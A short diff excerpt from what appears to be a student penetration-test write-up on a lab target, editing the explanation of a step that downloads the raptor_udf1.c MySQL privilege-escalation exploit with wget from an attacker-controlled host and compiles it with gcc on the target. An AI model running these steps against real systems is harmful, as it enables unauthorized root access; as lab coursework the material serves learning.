ExtonHoward/Raven_Security_project/Raven_Security_Engagement.md

 wget http://192.168.1.90/raptor_udf1.c
 ```

 Now to compile.
-Since Target 2 is running a Debian/GNU OS & the attacking machine is a Kali Linux machine, the exploit cannot be compiled on the attacking machine if it is to work on the Target.
-In order for this to work, the exploit must be compiled, then loaded into the MySQL database as a root user.
+Since Target 2 is running a Debian/GNU OS & the attacking machine is a Kali Linux machine, the exploit must be compiled in the same OS as it will be deployed on.

-Now to compile the code.

 ```
 gcc -g -c raptor_udf1.c